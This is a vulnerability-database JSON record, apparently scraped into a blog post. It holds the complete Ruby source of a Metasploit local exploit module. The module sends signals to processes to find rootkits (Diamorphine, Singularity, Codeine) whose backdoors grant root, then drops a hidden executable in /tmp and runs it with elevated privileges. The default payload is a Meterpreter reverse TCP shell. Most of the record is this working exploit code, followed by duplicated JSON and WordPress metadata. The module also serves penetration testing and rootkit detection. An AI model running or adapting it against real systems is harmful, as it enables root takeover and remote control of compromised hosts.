{“lastseen”:”2025-10-31T19:04:28″,”description”:”This module searches for rootkits which use signals to elevate process privileges to UID 0 (root). …”,”published”:”2025-10-31T18:58:29″,”modified”:”2025-10-31T18:58:29″,”type”:”metasploit”,”title”:”Rootkit Privilege Escalation Signal Hunter”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-LOCAL-ROOTKIT_PRIVESC_SIGNAL_HUNTER-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = GreatRanking\\n\\n include Msf::Post::File\\n include Msf::Post::Linux::Priv\\n include Msf::Post::Linux::System\\n include Msf::Exploit::EXE\\n include Msf::Exploit::FileDropper\\n include Msf::Exploit::Deprecated\\n\\n moved_from ‘exploit\/linux\/local\/diamorphine_rootkit_signal_priv_esc’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Rootkit Privilege Escalation Signal Hunter’,\\n ‘Description’ =\\u003e %q{\\n This module searches for rootkits which use signals to elevate\\n process privileges to UID 0 (root).\\n\\n Some rootkits install signal handlers which listen for specific\\n signals to elevate process privileges. This module identifies these\\n rootkits by sending signals and observing UID switching to root.\\n\\n This module has been tested successfully with:\\n\\n Singularity 5b6c4b6 (2025-10-19) on Ubuntu 24.04\\n kernel 6.14.0-33-generic (x64);\\n Diamorphine 2337293 (2023-09-20) on Ubuntu 22.04\\n kernel 5.19.0-38-generic (x64);\\n Codeine 9644336 (2025-09-02) on Ubuntu 22.04\\n kernel 5.19.0-38-generic (x64).\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e ‘bcoles’,\\n # Diamorphine rootkit first publicly documented use of signals for process privesc?\\n ‘DisclosureDate’ =\\u003e ‘2013-11-07’, # Diamorphine first public commit\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/github.com\/bcoles\/rootkit-signal-hunter’],\\n [‘URL’, ‘https:\/\/xcellerator.github.io\/posts\/linux_rootkits_03\/’],\\n [‘URL’, ‘https:\/\/github.com\/m0nad\/Diamorphine’],\\n [‘URL’, ‘https:\/\/github.com\/h3xduck\/Umbra’],\\n [‘URL’, ‘https:\/\/github.com\/diego-tella\/Codeine’],\\n [‘URL’, ‘https:\/\/github.com\/MatheuZSecurity\/Singularity’],\\n [‘URL’, ‘https:\/\/github.com\/Asekon\/RootKit’],\\n ],\\n ‘Platform’ =\\u003e [‘linux’],\\n ‘Arch’ =\\u003e [\\n ARCH_X86,\\n ARCH_X64,\\n ARCH_ARMLE,\\n ARCH_AARCH64,\\n ARCH_RISCV64LE,\\n ARCH_RISCV32LE,\\n ARCH_PPC,\\n ARCH_MIPSLE,\\n ARCH_MIPSBE\\n ],\\n ‘SessionTypes’ =\\u003e [‘shell’, ‘meterpreter’],\\n ‘Targets’ =\\u003e [[‘Auto’, {}]],\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION ],\\n ‘Stability’ =\\u003e [\\n CRASH_OS_DOWN, # Poorly designed rootkits may crash\\n ],\\n ‘SideEffects’ =\\u003e [\\n ARTIFACTS_ON_DISK,\\n SCREEN_EFFECTS, # Killing processes may spawn crash handler windows\\n ]\\n },\\n ‘DefaultOptions’ =\\u003e { ‘PAYLOAD’ =\\u003e ‘linux\/x64\/meterpreter\/reverse_tcp’ },\\n ‘DefaultTarget’ =\\u003e 0\\n )\\n )\\n register_options([\\n OptInt.new(‘MIN_SIGNAL’, [true, ‘Start at signal’, 0]),\\n OptInt.new(‘MAX_SIGNAL’, [true, ‘Stop at signal’, 64]),\\n OptString.new(‘PID’, [false, ‘Process ID to send signals to (leave blank to spawn a new process)’, ”])\\n ])\\n register_advanced_options([\\n OptString.new(‘WritableDir’, [true, ‘A directory where we can write files’, ‘\/tmp’])\\n ])\\n end\\n\\n def base_dir\\n datastore[‘WritableDir’].to_s\\n end\\n\\n def cmd_exec_elevated(signal, cmd, pid)\\n vprint_status(\\”Executing ‘#{cmd}’ with signal #{signal} (PID: #{pid}) …\\”)\\n\\n # NOTE: cleanup of hung processes will fail on non-POSIX shells (ie, fish)\\n # due to using \\”$!\\” which is not supported\\n res = cmd_exec(\\n %(sh -c ‘kill -#{signal} #{pid}; #{cmd}’ 2\\u003e\/dev\/null \\u0026 pid=$!; sleep 0.1; kill -CONT \\”$pid\\” 2\\u003e\/dev\/null; wait \\”$pid\\”),\\n nil,\\n 5\\n ).to_s\\n vprint_line(res) unless res.blank?\\n\\n res\\n end\\n\\n def check\\n return CheckCode::Unknown(‘Session already has root privileges’) if is_root?\\n\\n # NOTE: this will fail on non-POSIX shells (ie, fish)\\n # due to using \\”$$\\” which is not supported\\n pid = datastore[‘PID’].downcase.blank? ? ‘\\\\$$’ : datastore[‘PID’]\\n\\n # Iterate from MIN to MAX sending each signal to PID.\\n #\\n # SIGCONT if the process hangs.\\n # Note: cleanup of hung processes will fail on non-POSIX shells (ie, fish)\\n # due to using \\”$!\\” which is not supported\\n cmd = [\\n \\”i=#{datastore[‘MIN_SIGNAL’]}\\”,\\n %(while [ \\”$i\\” -le #{datastore[‘MAX_SIGNAL’]} ]),\\n %(do sh -c \\”kill -$i #{pid}; id\\” 2\\u003e\/dev\/null \\u0026 pid=$!),\\n ‘sleep 0.1; kill -CONT \\”$pid\\” 2\\u003e\/dev\/null’,\\n ‘wait \\”$pid\\”‘,\\n ‘i=$((i + 1))’,\\n ‘done 2\\u003e\/dev\/null’\\n ].join(‘; ‘)\\n\\n res = cmd_exec(\\n cmd,\\n nil,\\n 60\\n )\\n vprint_line(res) unless res.blank?\\n\\n return CheckCode::Safe(‘No rootkits detected’) unless res.to_s.include?(‘uid=0’)\\n\\n CheckCode::Vulnerable(‘Rootkit(s) are installed and configured to elevate privileges for signals.’)\\n end\\n\\n # @return Array of signals which can be used to elevate privileges to root\\n def brute_signals(min, max, pid)\\n print_status(\\”Trying signals #{min} to #{max} (PID: #{pid}) …\\”)\\n signals = []\\n\\n (min..max).each do |signal|\\n signals \\u003c\\u003c signal if cmd_exec_elevated(signal, ‘id’, pid).to_s.include?(‘uid=0’)\\n end\\n\\n signals\\n end\\n\\n def exploit\\n fail_with(Failure::BadConfig, ‘Session already has root privileges.’) if is_root?\\n fail_with(Failure::BadConfig, \\”Start signal (#{datastore[‘MIN_SIGNAL’]}) is greater than stop signal (#{datastore[‘MAX_SIGNAL’]}); nothing to iterate.\\”) if datastore[‘MIN_SIGNAL’] \\u003e datastore[‘MAX_SIGNAL’]\\n fail_with(Failure::BadConfig, \\”#{base_dir} is not writable\\”) unless writable?(base_dir)\\n\\n pid = datastore[‘PID’].downcase.blank? ? ‘$$’ : datastore[‘PID’]\\n signals = brute_signals(\\n datastore[‘MIN_SIGNAL’],\\n datastore[‘MAX_SIGNAL’],\\n pid\\n )\\n\\n fail_with(Failure::NotVulnerable, ‘No rootkits detected’) if signals.blank?\\n\\n print_good(\\”Found #{signals.size} signals for privilege escalation (#{signals.join(‘, ‘)}).\\”)\\n\\n payload_name = \\”.#{rand_text_alphanumeric(8..12)}\\”\\n payload_path = \\”#{base_dir}\/#{payload_name}\\”\\n payload_data = generate_payload_exe\\n print_status(\\”Writing ‘#{payload_path}’ (#{payload_data.size} bytes) …\\”)\\n write_file(payload_path, payload_data)\\n chmod(payload_path, 0o755)\\n register_file_for_cleanup(payload_path)\\n\\n signals.each do |signal|\\n print_status(\\”Trying signal #{signal} …\\”)\\n cmd_exec_elevated(signal, \\”#{payload_path} \\u0026 echo \\”, pid)\\n sleep(5)\\n break if session_created?\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/local\/rootkit_privesc_signal_hunter.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/local\/rootkit_privesc_signal_hunter\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-31T19:04:28″,”description”:”This module searches for rootkits which use signals to elevate process privileges to UID 0 (root). …”,”published”:”2025-10-31T18:58:29″,”modified”:”2025-10-31T18:58:29″,”type”:”metasploit”,”title”:”Rootkit Privilege Escalation Signal Hunter”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-LOCAL-ROOTKIT_PRIVESC_SIGNAL_HUNTER-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-24263","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n